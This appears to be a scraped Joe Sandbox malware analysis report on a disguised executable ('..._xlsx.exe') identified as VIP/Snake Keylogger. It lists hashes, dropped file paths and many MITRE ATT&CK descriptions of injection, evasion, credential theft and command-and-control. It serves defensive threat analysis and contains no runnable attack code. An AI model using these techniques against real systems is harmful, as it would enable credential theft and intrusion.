Function 014F7128 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;cq, xrefs: 014F713E
\;cq, xrefs: 014F7166
\;cq, xrefs: 014F715A
\;cq, xrefs: 014F7134

Memory Dump Source

Source File: 0000000E.00000002.4514273487.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_14f0000_OnCgVRIhY.jbxd

Similarity

API ID:
String ID: \;cq$\;cq$\;cq$\;cq
API String ID: 0-2961067002
Opcode ID: d93b2b5584e33e40b078aa9719b343ae7afa8a46faa0d72facb96cd34da4f830
Instruction ID: 57bcdda1dbaee9d92cfedec6f4dad7a7e9db8a87ac1059259e26187054f0e180
Opcode Fuzzy Hash: d93b2b5584e33e40b078aa9719b343ae7afa8a46faa0d72facb96cd34da4f830
Instruction Fuzzy Hash: 6B0178317101158FDB288E2DCA8092777F7AFC976272541AFE602CB3B6DA35DC4A8790

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OnCgVRIhY.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aju0ovhc.hm4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bleeyba5.jwl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cubm45qi.tff.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyybqu4b.t2p.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2b05ib0.lfi.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njybn5xo.zbl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyfheknh.0ir.ps1

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre